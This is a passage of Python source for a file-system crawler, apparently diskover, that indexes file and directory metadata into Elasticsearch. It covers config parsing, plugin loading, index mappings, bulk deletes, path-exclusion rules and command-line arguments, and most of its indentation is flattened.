sys.stdout.write('\n')
sys.stdout.flush()
def load_config():
"""This is the load config function.
It checks for config file and loads in
the config settings.
"""
configsettings = {}
config = ConfigParser.ConfigParser()
dir_path = os.path.dirname(os.path.realpath(__file__))
# check if env var for config file and use that
try:
configfile = os.environ['DISKOVER_CONFIG']
    except KeyError:
        configfile = '%s/diskover.cfg' % dir_path
# Check for config file
if not os.path.isfile(configfile):
print('Config file %s not found, exiting.' % configfile)
sys.exit(1)
config.read(configfile)
# Check if any sections missing from config and exit if there is
try:
try:
d = config.get('excludes', 'dirs')
dirs = d.split(',')
configsettings['excluded_dirs'] = set(dirs)
except ConfigParser.NoOptionError:
configsettings['excluded_dirs'] = set([])
try:
f = config.get('excludes', 'files')
files = f.split(',')
configsettings['excluded_files'] = set(files)
except ConfigParser.NoOptionError:
configsettings['excluded_files'] = set([])
try:
d = config.get('includes', 'dirs')
dirs = d.split(',')
configsettings['included_dirs'] = set(dirs)
        except ConfigParser.NoOptionError:
configsettings['included_dirs'] = set([])
try:
f = config.get('includes', 'files')
files = f.split(',')
configsettings['included_files'] = set(files)
except ConfigParser.NoOptionError:
configsettings['included_files'] = set([])
try:
configsettings['ownersgroups_uidgidonly'] = config.get('ownersgroups', 'uidgidonly').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_uidgidonly'] = "false"
try:
configsettings['ownersgroups_domain'] = config.get('ownersgroups', 'domain').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_domain'] = "false"
try:
configsettings['ownersgroups_domainsep'] = config.get('ownersgroups', 'domainsep')
except ConfigParser.NoOptionError:
configsettings['ownersgroups_domainsep'] = "\\"
try:
configsettings['ownersgroups_keepdomain'] = config.get('ownersgroups', 'keepdomain').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_keepdomain'] = "false"
try:
t = config.get('autotag', 'files')
if os.path.isfile("%s/%s" % (os.getcwd(),t)):
atf = json.loads(open("%s/%s" % (os.getcwd(),t)).read())
else:
atf = json.loads(t)
configsettings['autotag_files'] = atf
except ValueError as e:
raise ValueError("Error in config autotag files: %s" % e)
except ConfigParser.NoOptionError:
configsettings['autotag_files'] = []
try:
t = config.get('autotag', 'dirs')
if os.path.isfile("%s/%s" % (os.getcwd(),t)):
atd = json.loads(open("%s/%s" % (os.getcwd(),t)).read())
else:
atd = json.loads(t)
configsettings['autotag_dirs'] = atd
except ValueError as e:
raise ValueError("Error in config autotag dirs: %s" % e)
except ConfigParser.NoOptionError:
configsettings['autotag_dirs'] = []
try:
configsettings['aws'] = config.get('elasticsearch', 'aws').lower()
except ConfigParser.NoOptionError:
configsettings['aws'] = "false"
try:
h = config.get('elasticsearch', 'host')
hosts = h.split(',')
configsettings['es_host'] = hosts
except ConfigParser.NoOptionError:
configsettings['es_host'] = ['localhost']
try:
configsettings['es_port'] = int(config.get('elasticsearch', 'port'))
except ConfigParser.NoOptionError:
configsettings['es_port'] = 9200
try:
configsettings['es_user'] = config.get('elasticsearch', 'user')
except ConfigParser.NoOptionError:
configsettings['es_user'] = ""
try:
configsettings['es_password'] = config.get('elasticsearch', 'password')
except ConfigParser.NoOptionError:
configsettings['es_password'] = ""
try:
configsettings['index'] = config.get('elasticsearch', 'indexname')
except ConfigParser.NoOptionError:
configsettings['index'] = ""
try:
configsettings['es_timeout'] = int(config.get('elasticsearch', 'timeout'))
except ConfigParser.NoOptionError:
configsettings['es_timeout'] = 10
try:
configsettings['es_maxsize'] = int(config.get('elasticsearch', 'maxsize'))
except ConfigParser.NoOptionError:
configsettings['es_maxsize'] = 10
try:
configsettings['es_max_retries'] = int(config.get('elasticsearch', 'maxretries'))
except ConfigParser.NoOptionError:
configsettings['es_max_retries'] = 0
try:
configsettings['es_wait_status_yellow'] = config.get('elasticsearch', 'wait').lower()
except ConfigParser.NoOptionError:
configsettings['es_wait_status_yellow'] = "false"
try:
configsettings['es_chunksize'] = int(config.get('elasticsearch', 'chunksize'))
except ConfigParser.NoOptionError:
configsettings['es_chunksize'] = 500
try:
configsettings['index_shards'] = int(config.get('elasticsearch', 'shards'))
except ConfigParser.NoOptionError:
configsettings['index_shards'] = 5
try:
configsettings['index_replicas'] = int(config.get('elasticsearch', 'replicas'))
except ConfigParser.NoOptionError:
configsettings['index_replicas'] = 1
try:
configsettings['index_refresh'] = config.get('elasticsearch', 'indexrefresh')
except ConfigParser.NoOptionError:
configsettings['index_refresh'] = "1s"
try:
configsettings['disable_replicas'] = config.get('elasticsearch', 'disablereplicas').lower()
except ConfigParser.NoOptionError:
configsettings['disable_replicas'] = "false"
try:
configsettings['index_translog_size'] = config.get('elasticsearch', 'translogsize')
except ConfigParser.NoOptionError:
configsettings['index_translog_size'] = "512mb"
try:
configsettings['es_scrollsize'] = int(config.get('elasticsearch', 'scrollsize'))
except ConfigParser.NoOptionError:
configsettings['es_scrollsize'] = 100
try:
configsettings['redis_host'] = config.get('redis', 'host')
except ConfigParser.NoOptionError:
configsettings['redis_host'] = "localhost"
try:
configsettings['redis_port'] = int(config.get('redis', 'port'))
except ConfigParser.NoOptionError:
configsettings['redis_port'] = 6379
try:
configsettings['redis_socket'] = config.get('redis', 'socket')
except ConfigParser.NoOptionError:
configsettings['redis_socket'] = ""
try:
configsettings['redis_password'] = config.get('redis', 'password')
except ConfigParser.NoOptionError:
configsettings['redis_password'] = ""
try:
configsettings['redis_db'] = int(config.get('redis', 'db'))
except ConfigParser.NoOptionError:
configsettings['redis_db'] = 0
try:
configsettings['redis_rq_timeout'] = int(config.get('redis', 'timeout'))
except ConfigParser.NoOptionError:
configsettings['redis_rq_timeout'] = 180
try:
configsettings['redis_ttl'] = int(config.get('redis', 'ttl'))
except ConfigParser.NoOptionError:
configsettings['redis_ttl'] = 500
try:
configsettings['redis_queue'] = config.get('redis', 'queue')
except ConfigParser.NoOptionError:
configsettings['redis_queue'] = "diskover"
try:
configsettings['redis_queue_crawl'] = config.get('redis', 'queuecrawl')
except ConfigParser.NoOptionError:
configsettings['redis_queue_crawl'] = "diskover_crawl"
try:
configsettings['redis_queue_calcdir'] = config.get('redis', 'queuecalcdir')
except ConfigParser.NoOptionError:
configsettings['redis_queue_calcdir'] = "diskover_calcdir"
try:
configsettings['adaptivebatch_startsize'] = int(config.get('adaptivebatch', 'startsize'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_startsize'] = 50
try:
configsettings['adaptivebatch_maxsize'] = int(config.get('adaptivebatch', 'maxsize'))
except ConfigParser.NoOptionError:
            configsettings['adaptivebatch_maxsize'] = 500
try:
configsettings['adaptivebatch_stepsize'] = int(config.get('adaptivebatch', 'stepsize'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_stepsize'] = 10
try:
configsettings['adaptivebatch_maxfiles'] = int(config.get('adaptivebatch', 'maxfiles'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_maxfiles'] = 50000
try:
configsettings['listener_host'] = config.get('socketlistener', 'host')
except ConfigParser.NoOptionError:
configsettings['listener_host'] = "localhost"
try:
configsettings['listener_port'] = int(config.get('socketlistener', 'port'))
except ConfigParser.NoOptionError:
configsettings['listener_port'] = 9999
try:
configsettings['listener_maxconnections'] = int(config.get('socketlistener', 'maxconnections'))
except ConfigParser.NoOptionError:
configsettings['listener_maxconnections'] = 5
try:
configsettings['listener_twcport'] = int(config.get('socketlistener', 'twcport'))
except ConfigParser.NoOptionError:
configsettings['listener_twcport'] = 9998
try:
configsettings['diskover_path'] = config.get('paths', 'diskoverpath')
except ConfigParser.NoOptionError:
configsettings['diskover_path'] = "./diskover.py"
try:
configsettings['python_path'] = config.get('paths', 'pythonpath')
except ConfigParser.NoOptionError:
configsettings['python_path'] = "python"
try:
configsettings['md5_readsize'] = int(config.get('dupescheck', 'readsize'))
except ConfigParser.NoOptionError:
configsettings['md5_readsize'] = 65536
try:
configsettings['dupes_maxsize'] = int(config.get('dupescheck', 'maxsize'))
except ConfigParser.NoOptionError:
configsettings['dupes_maxsize'] = 1073741824
try:
configsettings['dupes_checkbytes'] = int(config.get('dupescheck', 'checkbytes'))
except ConfigParser.NoOptionError:
configsettings['dupes_checkbytes'] = 64
try:
configsettings['dupes_restoretimes'] = config.get('dupescheck', 'restoretimes').lower()
except ConfigParser.NoOptionError:
configsettings['dupes_restoretimes'] = "false"
try:
configsettings['dupes_threads'] = int(config.get('dupescheck', 'threads'))
except ConfigParser.NoOptionError:
configsettings['dupes_threads'] = 8
try:
configsettings['gource_maxfilelag'] = float(config.get('gource', 'maxfilelag'))
except ConfigParser.NoOptionError:
configsettings['gource_maxfilelag'] = 5
try:
configsettings['api_url'] = config.get('crawlapi', 'url')
except ConfigParser.NoOptionError:
configsettings['api_url'] = ""
try:
configsettings['api_user'] = config.get('crawlapi', 'user')
except ConfigParser.NoOptionError:
configsettings['api_user'] = ""
try:
configsettings['api_password'] = config.get('crawlapi', 'password')
except ConfigParser.NoOptionError:
configsettings['api_password'] = ""
try:
configsettings['api_pagesize'] = config.get('crawlapi', 'pagesize')
except ConfigParser.NoOptionError:
configsettings['api_pagesize'] = ""
except ConfigParser.NoSectionError as e:
print('Missing section from diskover.cfg, check diskover.cfg.sample and copy over, exiting. (%s)' % e)
sys.exit(1)
return configsettings, configfile
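# A minimal sketch (not used above) of how the repeated try/except blocks in
# load_config() could be collapsed into one helper; 'conv' is any converter
# such as int or float, and the helper name is illustrative only.
def _get_option(config, section, option, default, conv=str):
    try:
        return conv(config.get(section, option))
    except ConfigParser.NoOptionError:
        return default
# usage sketch:
# configsettings['es_port'] = _get_option(config, 'elasticsearch', 'port', 9200, int)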
def get_plugins_info():
"""This is the get plugins info function.
    It gets a list of python plugin modules in
    the plugins directory and returns their information.
"""
plugin_dir = os.path.dirname(os.path.realpath(__file__)) + "/plugins"
main_module = "__init__"
plugins_info = []
possible_plugins = os.listdir(plugin_dir)
for i in possible_plugins:
location = os.path.join(plugin_dir, i)
if not os.path.isdir(location) or not main_module + ".py" \
in os.listdir(location):
continue
if IS_PY3:
spec = importlib.machinery.PathFinder().find_spec(main_module, [location])
else:
import imp
spec = imp.find_module(main_module, [location])
plugins_info.append({"name": i, "spec": spec})
return plugins_info
def load_plugins():
"""This is the load plugins function.
    It dynamically loads the plugins and returns them in a list.
"""
loaded_plugins = []
plugins_info = get_plugins_info()
for plugin_info in plugins_info:
if IS_PY3:
plugin_module = importlib.util.module_from_spec(plugin_info["spec"])
plugin_info["spec"].loader.exec_module(plugin_module)
else:
import imp
plugin_module = imp.load_module(plugin_info["name"], *plugin_info["spec"])
loaded_plugins.append(plugin_module)
return loaded_plugins
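# Expected plugin layout (sketch): plugins/<name>/__init__.py. Each loaded
# plugin module may expose hooks used elsewhere in diskover, e.g. the
# add_mappings() hook called from index_create() below.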
def list_plugins():
"""This is the list plugins function.
    It prints the names of all the available plugins.
"""
plugins_info = get_plugins_info()
for plugin_info in plugins_info:
print(plugin_info["name"])
def user_prompt(question):
""" Prompt the yes/no-*question* to the user. """
from distutils.util import strtobool
while True:
try:
if IS_PY3:
user_input = input(question + " [y/n]: ").lower()
else:
user_input = raw_input(question + " [y/n]: ").lower()
result = strtobool(user_input)
return result
except ValueError:
print("Please use y/n or yes/no.\n")
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def index_create(indexname):
"""This is the es index create function.
    It checks for an existing index and deletes it if
    one with the same name exists. It also creates
    the new index and sets up mappings.
"""
logger.info('Checking es index: %s', indexname)
# check for existing es index
if es.indices.exists(index=indexname):
# check if reindex cli argument and don't delete existing index
if cliargs['reindex']:
logger.info('Reindexing (non-recursive, preserving tags)')
return
elif cliargs['reindexrecurs']:
logger.info('Reindexing (recursive, preserving tags)')
return
# delete existing index
else:
if cliargs['forcedropexisting']:
logger.warning('es index exists, deleting')
es.indices.delete(index=indexname, ignore=[400, 404])
else:
if user_prompt("Drop existing index?"):
logger.warning('es index exists, deleting')
es.indices.delete(index=indexname, ignore=[400, 404])
else:
logger.info("Cannot continue with index. Exiting.")
sys.exit(1)
# set up es index mappings and create new index
mappings = {
"settings": {
"index" : {
"number_of_shards": config['index_shards'],
"number_of_replicas": config['index_replicas']
}
},
"mappings": {
"diskspace": {
"properties": {
"path": {
"type": "keyword"
},
"total": {
"type": "long"
},
"used": {
"type": "long"
},
"free": {
"type": "long"
},
"available": {
"type": "long"
},
"indexing_date": {
"type": "date"
}
}
},
"crawlstat": {
"properties": {
"path": {
"type": "keyword"
},
"state": {
"type": "text"
},
"crawl_time": {
"type": "float"
},
"indexing_date": {
"type": "date"
}
}
},
"worker": {
"properties": {
"worker_name": {
"type": "keyword"
},
"dir_count": {
"type": "integer"
},
"file_count": {
"type": "integer"
},
"bulk_time": {
"type": "float"
},
"crawl_time": {
"type": "float"
},
"indexing_date": {
"type": "date"
}
}
},
"directory": {
"properties": {
"filename": {
"type": "keyword"
},
"path_parent": {
"type": "keyword"
},
"filesize": {
"type": "long"
},
"items": {
"type": "long"
},
"items_files": {
"type": "long"
},
"items_subdirs": {
"type": "long"
},
"owner": {
"type": "keyword"
},
"group": {
"type": "keyword"
},
"last_modified": {
"type": "date"
},
"last_access": {
"type": "date"
},
"last_change": {
"type": "date"
},
"hardlinks": {
"type": "integer"
},
"inode": {
"type": "keyword"
},
"tag": {
"type": "keyword"
},
"tag_custom": {
"type": "keyword"
},
"crawl_time": {
"type": "float"
},
"change_percent_filesize": {
"type": "float"
},
"change_percent_items": {
"type": "float"
},
"change_percent_items_files": {
"type": "float"
},
"change_percent_items_subdirs": {
"type": "float"
},
"worker_name": {
"type": "keyword"
},
"indexing_date": {
"type": "date"
}
}
},
"file": {
"properties": {
"filename": {
"type": "keyword"
},
"extension": {
"type": "keyword"
},
"path_parent": {
"type": "keyword"
},
"filesize": {
"type": "long"
},
"owner": {
"type": "keyword"
},
"group": {
"type": "keyword"
},
"last_modified": {
"type": "date"
},
"last_access": {
"type": "date"
},
"last_change": {
"type": "date"
},
"hardlinks": {
"type": "integer"
},
"inode": {
"type": "keyword"
},
"filehash": {
"type": "keyword"
},
"tag": {
"type": "keyword"
},
"tag_custom": {
"type": "keyword"
},
"dupe_md5": {
"type": "keyword"
},
"worker_name": {
"type": "keyword"
},
"indexing_date": {
"type": "date"
}
}
}
}
}
# check plugins for additional mappings
for plugin in plugins:
mappings = (plugin.add_mappings(mappings))
logger.info('Creating es index')
es.indices.create(index=indexname, body=mappings)
time.sleep(.5)
def index_bulk_add(es, doclist, config, cliargs):
"""This is the es index bulk add function.
It bulk adds/updates/removes using file/directory
meta data lists from worker's crawl results.
"""
if config['es_wait_status_yellow'] == "true":
# wait for es health to be at least yellow
es.cluster.health(wait_for_status='yellow',
request_timeout=config['es_timeout'])
# bulk load data to Elasticsearch index
diskover_connections.helpers.bulk(es, doclist, index=cliargs['index'],
chunk_size=config['es_chunksize'], request_timeout=config['es_timeout'])
def index_delete_path(path, cliargs, logger, reindex_dict, recursive=False):
"""This is the es delete path bulk function.
It finds all file and directory docs in path and deletes them from es
including the directory (path).
Recursive will also find and delete all docs in subdirs of path.
Stores any existing tags in reindex_dict.
Returns reindex_dict.
"""
file_id_list = []
dir_id_list = []
file_delete_list = []
dir_delete_list = []
# refresh index
es.indices.refresh(index=cliargs['index'])
# escape special characters
newpath = escape_chars(path)
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
# file doc search
if recursive:
data = {
"query": {
"query_string": {
"query": "path_parent: " + newpath + " OR "
"path_parent: " + newpathwildcard,
"analyze_wildcard": "true"
}
}
}
else:
data = {
"query": {
"query_string": {
"query": "path_parent: " + newpath
}
}
}
logger.info('Searching for all files in %s' % path)
# search es and start scroll
res = es.search(index=cliargs['index'], doc_type='file', scroll='1m',
size=config['es_scrollsize'], body=data,
request_timeout=config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
# add doc id to file_id_list
file_id_list.append(hit['_id'])
# add file path info inc. tags to reindex_file_list
reindex_dict['file'].append((hit['_source']['path_parent'] +
'/' + hit['_source']['filename'],
hit['_source']['tag'],
hit['_source']['tag_custom']))
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s files for %s' % (len(file_id_list), path))
# add file id's to delete_list
for i in file_id_list:
d = {
'_op_type': 'delete',
'_index': cliargs['index'],
'_type': 'file',
'_id': i
}
file_delete_list.append(d)
if len(file_delete_list) > 0:
# bulk delete files in es
logger.info('Bulk deleting files in es index')
index_bulk_add(es, file_delete_list, config, cliargs)
# directory doc search
if recursive:
data = {
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR '
'(path_parent: ' + newpathwildcard + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")',
'analyze_wildcard': 'true'
}
}
}
else:
data = {
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")'
}
}
}
logger.info('Searching for all directories in %s' % path)
# search es and start scroll
res = es.search(index=cliargs['index'], doc_type='directory', scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
# add directory doc id to dir_id_list
dir_id_list.append(hit['_id'])
# add directory path info inc. tags, filesize, items to reindex_dir_list
reindex_dict['directory'].append((hit['_source']['path_parent'] +
'/' + hit['_source']['filename'],
hit['_source']['tag'],
hit['_source']['tag_custom']))
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s directories for %s' % (len(dir_id_list), path))
# add dir id's to delete_list
for i in dir_id_list:
d = {
'_op_type': 'delete',
'_index': cliargs['index'],
'_type': 'directory',
'_id': i
}
dir_delete_list.append(d)
if len(dir_delete_list) > 0:
# bulk delete directories in es
logger.info('Bulk deleting directories in es index')
index_bulk_add(es, dir_delete_list, config, cliargs)
return reindex_dict
def index_get_docs(cliargs, logger, doctype='directory', copytags=False, hotdirs=False,
index=None, path=None, sort=False, maxdepth=None, pathid=False):
"""This is the es get docs function.
It finds all docs (by doctype) in es and returns doclist
which contains doc id, fullpath and mtime for all docs.
If copytags is True will return tags from previous index.
If path is specified will return just documents in and under directory path.
If sort is True, will return paths in asc path order.
if pathid is True, will return dict with path and their id.
"""
data = _index_get_docs_data(index, cliargs, logger, doctype=doctype, path=path,
maxdepth=maxdepth, sort=sort)
# refresh index
es.indices.refresh(index)
# search es and start scroll
res = es.search(index=index, doc_type=doctype, scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
doclist = []
pathdict = {}
doccount = 0
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
fullpath = os.path.abspath(os.path.join(hit['_source']['path_parent'], hit['_source']['filename']))
if copytags:
doclist.append((fullpath, hit['_source']['tag'], hit['_source']['tag_custom'], doctype))
elif hotdirs:
doclist.append((hit['_id'], fullpath, hit['_source']['filesize'], hit['_source']['items'],
hit['_source']['items_files'], hit['_source']['items_subdirs']))
elif pathid:
rel_path = fullpath.replace(rootdir_path, ".")
pathdict[rel_path] = hit['_id']
else:
# convert es time to unix time format
mtime = time.mktime(datetime.strptime(
hit['_source']['last_modified'],
'%Y-%m-%dT%H:%M:%S').timetuple())
doclist.append((hit['_id'], fullpath, mtime, doctype))
doccount += 1
# use es scroll api
res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s %s docs' % (str(doccount), doctype))
if pathid:
return pathdict
else:
return doclist
def _index_get_docs_data(index, cliargs, logger, doctype='directory', path=None, maxdepth=None, sort=False):
if cliargs['copytags']:
logger.info('Searching for all %s docs with tags in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'tag', 'tag_custom'],
'query': {
'query_string': {
'query': 'tag:(NOT "") OR tag_custom:(NOT "")'
}
}
}
elif cliargs['hotdirs']:
logger.info('Searching for all %s docs in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'filesize', 'items', 'items_files', 'items_subdirs'],
'query': {
'match_all': {}
}
}
else:
if path is None:
if maxdepth is None:
logger.info('Searching for all %s docs in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'match_all': {}
}
}
else:
# depth at rootdir
num_sep = cliargs['rootdir'].count(os.path.sep)
n = num_sep + maxdepth - 1
regexp = '(/[^/]+){1,' + str(n) + '}|/?'
logger.info('Searching for all %s docs in %s (maxdepth %s)...', doctype, index, maxdepth)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'regexp': {'path_parent': regexp}
}
}
else:
# escape special characters
newpath = escape_chars(path)
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
logger.info('Searching for all %s docs in %s for path %s...', doctype, index, path)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR '
'(path_parent: ' + newpathwildcard + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")',
}
}
}
if sort:
data['sort'] = [{'path_parent': {'order': 'desc'}}]
return data
def replace_path(path):
"""This is the replace path function.
It replaces paths and drive letters sent to bots.
"""
frompath = cliargs['replacepath'][0]
topath = cliargs['replacepath'][1]
path = path.replace(frompath, topath)
# change any windows path separators (for bots running in linux)
path = path.replace('\\', '/')
return path
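# e.g. with --replacepath Z:\ /mnt/share/ the path 'Z:\projects\file.txt'
# becomes '/mnt/share/projects/file.txt' (separators normalized to '/').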
def split_list(a, n):
"""Generator that splits list a evenly into n pieces
"""
if IS_PY3:
xrange = range
k, m = divmod(len(a), n)
return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))
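# e.g. list(split_list([1, 2, 3, 4, 5], 2)) -> [[1, 2, 3], [4, 5]]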
def add_diskspace(index, logger, path):
"""This is the add disk space function.
It adds total, used, free and available
disk space for a path to es.
"""
try: # linux
statvfs = os.statvfs(path)
# Size of filesystem in bytes
total = statvfs.f_frsize * statvfs.f_blocks
# Actual number of free bytes
free = statvfs.f_frsize * statvfs.f_bfree
# Number of free bytes that ordinary users are allowed
# to use (excl. reserved space)
available = statvfs.f_frsize * statvfs.f_bavail
except AttributeError: # windows
import ctypes
total_bytes = ctypes.c_ulonglong(0)
free_bytes = ctypes.c_ulonglong(0)
available_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(path),
ctypes.pointer(available_bytes),
ctypes.pointer(total_bytes),
ctypes.pointer(free_bytes))
total = total_bytes.value
free = free_bytes.value
available = available_bytes.value
if cliargs['replacepath']:
path = replace_path(path)
used = total - free
indextime_utc = datetime.utcnow().isoformat()
data = {
"path": path,
"total": total,
"used": used,
"free": free,
"available": available,
"indexing_date": indextime_utc
}
# add to es
logger.info('Adding disk space info to es index')
es.index(index=index, doc_type='diskspace', body=data)
def add_crawl_stats(es, index, path, crawltime, state):
"""This is the add crawl stats function.
It adds crawl stats info to es when crawl starts and finishes.
"""
data = {
"path": path,
"state": state, # running, finished_crawl, finished_dircalc
"crawl_time": round(crawltime, 6),
"indexing_date": datetime.utcnow().isoformat()
}
es.index(index=index, doc_type='crawlstat', body=data)
def dir_excluded(path, config, cliargs):
"""Return True if path in excluded_dirs set,
False if not in the list"""
name = os.path.basename(path)
# return if directory in included list (whitelist)
if name in config['included_dirs'] or path in config['included_dirs']:
return False
# skip any dirs in excluded_dirs
if name in config['excluded_dirs'] or path in config['excluded_dirs']:
if cliargs['verbose']:
logger.info('Skipping (excluded dir) %s', path)
return True
# skip any dirs which start with . (dot) and in excluded_dirs
if name.startswith('.') and u'.*' in config['excluded_dirs']:
if cliargs['verbose']:
logger.info('Skipping (.* dir) %s', path)
return True
# skip any dirs that are found in reg exp checks including wildcard searches
found_dir = False
found_path = False
for d in config['excluded_dirs']:
if d == '.*':
continue
if d.startswith('*') and d.endswith('*'):
d = d.replace('*', '')
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
        elif d.startswith('*'):
            # strip the leading '*' so the pattern stays a valid regex,
            # then anchor the match to the end of the string
            d = d.lstrip('*') + '$'
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
        elif d.endswith('*'):
            # strip the trailing '*' and anchor to the start of the string
            d = '^' + d.rstrip('*')
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
else:
if d == name:
found_dir = True
break
elif d == path:
found_path = True
break
if found_dir or found_path:
if cliargs['verbose']:
logger.info('Skipping (excluded dir) %s', path)
return True
return False
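# Wildcard semantics for dir_excluded() (examples): an excluded_dirs entry
# '*cache*' matches any dir name containing 'cache', 'tmp*' matches names
# starting with 'tmp', '*~' matches names ending in '~', and the literal
# entry '.*' excludes all dot-directories. Entries without a '*' must match
# the name or full path exactly.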
def escape_chars(text):
"""This is the escape special characters function.
It returns escaped path strings for es queries.
"""
# escape any backslash chars
text = text.replace('\\', '\\\\')
# escape any characters in chr_dict
chr_dict = {'\n': '\\n', '\t': '\\t',
'/': '\\/', '(': '\\(', ')': '\\)', '[': '\\[', ']': '\\]', '$': '\\$',
' ': '\\ ', '&': '\\&', '<': '\\<', '>': '\\>', '+': '\\+', '-': '\\-',
'|': '\\|', '!': '\\!', '{': '\\{', '}': '\\}', '^': '\\^', '~': '\\~',
'?': '\\?', ':': '\\:', '=': '\\=', '\'': '\\\'', '"': '\\"', '@': '\\@',
'.': '\\.', '#': '\\#', '*': '\\*'}
def char_trans(text, chr_dict):
for key, value in chr_dict.items():
text = text.replace(key, value)
return text
if IS_PY3:
text_esc = text.translate(str.maketrans(chr_dict))
else:
text_esc = char_trans(text, chr_dict)
return text_esc
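# e.g. escape_chars('/data/my dir (old)') returns
# '\/data\/my\ dir\ \(old\)' for safe use in an es query_string query.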
def get_time(seconds):
"""This is the get time function
It returns human readable time format for stats.
"""
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
return "%dd:%dh:%02dm:%02ds" % (d, h, m, s)
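# e.g. get_time(90061) -> '1d:1h:01m:01s'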
def convert_size(size_bytes):
"""This is the convert size function
It returns human readable file sizes.
"""
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
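# e.g. convert_size(1536) -> '1.5 KB'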
def parse_cli_args(indexname):
"""This is the parse CLI arguments function.
It parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--rootdir", metavar='ROOTDIR', default=".",
help="Directory to start crawling from (default: .)")
parser.add_argument("-m", "--mtime", metavar='DAYS', default=0, type=int,
help="Minimum (+num) / maximum (-num) days ago for file modified time (default: 0)")
parser.add_argument("-s", "--minsize", metavar='BYTES', default=1, type=int,
help="Minimum file size in Bytes (default: 1 Bytes)")
parser.add_argument("-e", "--indexemptydirs", action="store_true",
help="Index empty directories (default: don't index)")
parser.add_argument("-i", "--index", default=indexname,
help="Elasticsearch index name (default: from config)")
parser.add_argument("-M", "--maxdepth", type=int, default=None,
help="Maximum directory depth to crawl (default: None)")
parser.add_argument("-c", "--maxdcdepth", type=int, default=None,
help="Maximum directory depth to calculate directory sizes/items (default: None)")
parser.add_argument("-b", "--batchsize", type=int, default=50,
help="Batch size (dir count) for sending to worker bots (default: 50)")
parser.add_argument("-a", "--adaptivebatch", action="store_true",
help="Adaptive batch size for sending to worker bots (intelligent crawl)")
parser.add_argument("-T", "--walkthreads", type=int, default=cpu_count()*2,
help="Number of threads for treewalk (default: cpu core count x 2)")
parser.add_argument("-A", "--autotag", action="store_true",
help="Get bots to auto-tag files/dirs based on patterns in config")
parser.add_argument("-S", "--sizeondisk", action="store_true",
help="Store size on disk (disk usage size) using block count x blocksize instead of file size")
parser.add_argument("-B", "--blocksize", type=int, metavar='BLOCKSIZE', default=512,
help="Blocksize (in bytes) used for --sizeondisk (default: 512)")
parser.add_argument("-O", "--optimizeindex", action="store_true",
help="Optimize index at end of crawl (reduce size)")
parser.add_argument("-r", "--reindex", action="store_true",
help="Reindex directory (non-recursive), data is added to existing index")
parser.add_argument("-R", "--reindexrecurs", action="store_true",
help="Reindex directory and all subdirs (recursive), data is added to existing index")
parser.add_argument("-F", "--forcedropexisting", action="store_true",
help="Silently drop an existing index (if present)")
parser.add_argument("-D", "--finddupes", action="store_true",
help="Find duplicate files in existing index and update their dupe_md5 field")
parser.add_argument("-C", "--copytags", metavar='INDEX2',
help="Copy tags from index2 to index")
parser.add_argument("-H", "--hotdirs", metavar='INDEX2',
help="Find hot dirs by calculating change percents from index2 (prev index) and update \
change_percent fields in index")
parser.add_argument("-l", "--listen", action="store_true",
help="Start tcp socket server and listen for remote commands")
parser.add_argument("-L", "--listentwc", action="store_true",
help="Start tcp socket server and listen for messages from diskover treewalk client")
parser.add_argument("--twcport", type=int, metavar='PORT',
help="Port number for tree walk client socket server (default: from config)")
parser.add_argument("--dirsonly", action="store_true",
help="Don't include files in batch sent to bots, only send dirs, bots scan for files")
parser.add_argument("--replacepath", nargs=2, metavar="PATH",
help="Replace path, example: --replacepath Z:\\ /mnt/share/")
